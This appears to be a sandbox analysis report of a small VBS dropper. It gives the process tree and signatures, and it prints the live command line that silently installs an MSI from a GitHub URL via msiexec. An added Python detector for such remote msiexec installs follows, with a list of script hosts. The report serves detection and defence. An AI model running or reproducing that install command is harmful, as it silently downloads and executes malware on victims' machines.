Analysis

max time kernel: 119s
max time network: 120s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 31-01-2025 03:48

Static task: static1
Behavioral task: behavioral1
  Sample: 41590f3a8ba3c910f11fd5fa095856d5bc556f20fa4fd6d269aa1be4e08b4c64.vbs
  Resource: win7-20240903-en (windows7-x64)
  4 signatures, 150 seconds
General

Target: 41590f3a8ba3c910f11fd5fa095856d5bc556f20fa4fd6d269aa1be4e08b4c64.vbs
Size: 512B
MD5: bcc1d6a3c9aeec994cd31f86ada37ae6
SHA1: 0b7bb7af96d842cfbb7a89793a4292fec4289a8c
SHA256: 41590f3a8ba3c910f11fd5fa095856d5bc556f20fa4fd6d269aa1be4e08b4c64
SHA512: 8793e62dc4a9465ef5254e15b3471573a242705dfdf74bd3d09d97c10dd84daf69aa8c0b5c9bc3c5a7302e431fc2ed417b1e6c194da106765e50ad385ea955b7
Score: 7/10
Malware Config
Signatures

Use of msiexec (install) with remote resource (1 IoC)
  pid 2308  msiexec.exe
  The client msiexec.exe was started with /i pointing at an https:// URL instead of a local .msi, together with /qn (quiet, no UI). This is the msiexec LOLBin pattern: the Windows Installer engine fetches and runs the package on the script's behalf, so the 512-byte .vbs needs no downloader code of its own. The package is hosted on github.com over TLS, so domain-reputation controls will not catch the fetch; the command line is the earliest and most reliable detection point.

Blocklisted process makes network request (2 IoCs)
  flow 5  pid 3048  msiexec.exe
  flow 6  pid 3048  msiexec.exe
  Both flows belong to PID 3048 (msiexec.exe /V, the Windows Installer service instance), not to PID 2308, the client that was given the URL: the client hands the install request to the service, and the service performs the download. A detection keyed on network activity therefore has to attribute the connection to the service process and correlate it back to the client invocation; a detection keyed on the client's command line fires before any byte leaves the host.

Suspicious use of AdjustPrivilegeToken (34 IoCs)
  pid 3048  msiexec.exe: SeRestorePrivilege, SeTakeOwnershipPrivilege, SeSecurityPrivilege
  pid 2308  msiexec.exe: SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
  (Entries are listed in the order reported within each pid; repeated names are separate calls.) The client requesting essentially every privilege in its token at once is not specific to this sample and is seen with legitimate MSI installs as well, so this signature adds little on its own. The sandbox records the AdjustTokenPrivileges attempt, not whether the privilege was actually present in the token and enabled.

Suspicious use of WriteProcessMemory (5 IoCs)
  PID 2688 (WScript.exe) wrote to the memory of PID 2308 (procid_target 31), 5 times
  The writes go from the script host to the msiexec.exe child it has just created. A parent writing into a freshly created child's address space (process parameters, environment) is how CreateProcess works, so this is the launch of msiexec rather than injection into an unrelated process.
Processes

WScript.exe  PID 2688  (depth 1)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\41590f3a8ba3c910f11fd5fa095856d5bc556f20fa4fd6d269aa1be4e08b4c64.vbs"
  - Suspicious use of WriteProcessMemory
  └─ msiexec.exe  PID 2308  (depth 2, child of 2688)
       "C:\Windows\System32\msiexec.exe" /i "https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi" /qn
       - Use of msiexec (install) with remote resource
       - Suspicious use of AdjustPrivilegeToken

msiexec.exe  PID 3048  (depth 1, separate root)
  C:\Windows\system32\msiexec.exe /V
  - Blocklisted process makes network request
  - Suspicious use of AdjustPrivilegeToken

The /V instance is the Windows Installer service (msiserver), started on demand by the Service Control Manager. Its parent is services.exe, not WScript.exe, which is why it appears as a second root in the tree even though it is doing the work (the download and the install) that the script requested. When hunting in endpoint telemetry, the script-to-installer link is the client process 2308 and its command line; the network and file activity will show up under the service process.
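The command line of PID 2308 carries everything needed to catch this technique before the service ever touches the network. The following detector is an added example written for this page; it is not part of the sandbox report or of any vendor's tooling. It runs over constructed Sysmon-style process-creation records (the field names Image, ParentImage and CommandLine are an assumption of this example): the first record's command line is copied from the report, the /V record mirrors the service instance above, and the remaining records are constructed benign and variant cases. It also generalises past the exact /i ... /qn form seen here to dash-style switches, the /package alias and other quiet switches.

```python
"""Flag msiexec.exe installs that pull the package from a remote URL.

Added example, not code from the sandbox report. Input records are
constructed, Sysmon-Event-ID-1-like dicts (Image, ParentImage, CommandLine);
those field names are an assumption of this example.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
TOKEN_RE = re.compile(r'"[^"]*"|\S+')

# msiexec switches that take a package (install, advertise, admin install, patch).
INSTALL_SWITCHES = {"i", "package", "a", "j", "jm", "ju", "p", "update"}
# Parents that should not normally be driving msiexec at a URL.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
                "cmd.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "wmic.exe"}

# Constructed sample records. The first command line is copied from the report;
# the second is the installer service instance; the rest are made up for the example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\WScript.exe",
     "CommandLine": r'"C:\Windows\System32\msiexec.exe" /i "https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi" /qn'},
    {"Image": r"C:\Windows\system32\msiexec.exe",
     "ParentImage": r"C:\Windows\system32\services.exe",
     "CommandLine": r"C:\Windows\system32\msiexec.exe /V"},
    {"Image": r"C:\Windows\System32\msiexec.exe",          # benign local install
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\tool.msi"'},
    {"Image": r"C:\Windows\System32\msiexec.exe",          # variant syntax, hypothetical host
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"msiexec -package HTTP://198.51.100.7/x.msi -quiet -norestart"},
    {"Image": r"C:\Windows\System32\msiexec.exe",          # interactive remote install
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"msiexec.exe /i https://example.invalid/a.msi"},
]


@dataclass
class Finding:
    suspicious: bool
    severity: str                  # "none", "medium" or "high"
    url: str = ""
    reasons: List[str] = field(default_factory=list)


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def analyze(event: Dict[str, str]) -> Finding:
    if basename(event.get("Image", "")) != "msiexec.exe":
        return Finding(False, "none")
    tokens = tokenize(event.get("CommandLine", ""))[1:]      # drop argv[0]
    switches = {t[1:].lower() for t in tokens if t[:1] in "/-" and len(t) > 1}
    urls = [t for t in tokens if URL_RE.match(t)]
    if not urls:                                             # local package or service (/V) instance
        return Finding(False, "none")
    reasons = ["remote package URL on msiexec command line"]
    if switches & INSTALL_SWITCHES:
        reasons.append("install/advertise/patch switch present")
    if any(s.startswith("q") or s in ("quiet", "passive") for s in switches):
        reasons.append("quiet/no-UI switch suppresses installer prompts")
    parent = basename(event.get("ParentImage", ""))
    if parent in SCRIPT_HOSTS:
        reasons.append(f"launched by scripting/LOLBin host {parent}")
    severity = "high" if len(reasons) >= 3 else "medium"
    return Finding(True, severity, urls[0], reasons)


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, Finding]]:
    """Return (command line, finding) for every record that fires."""
    hits = []
    for e in events:
        f = analyze(e)
        if f.suspicious:
            hits.append((e["CommandLine"], f))
    return hits


if __name__ == "__main__":
    for cmd, f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {cmd}\n    " + "\n    ".join(f.reasons))
```

The service's own /V instance never carries the URL, so this logic is silent on it by design; tie its network flows back to the client through the MsiInstaller events in the Application log or by process start time. Remote MSI installs are legitimate in environments that deploy software from an internal HTTPS server, so allowlist those hosts before promoting the "medium" tier to an alert.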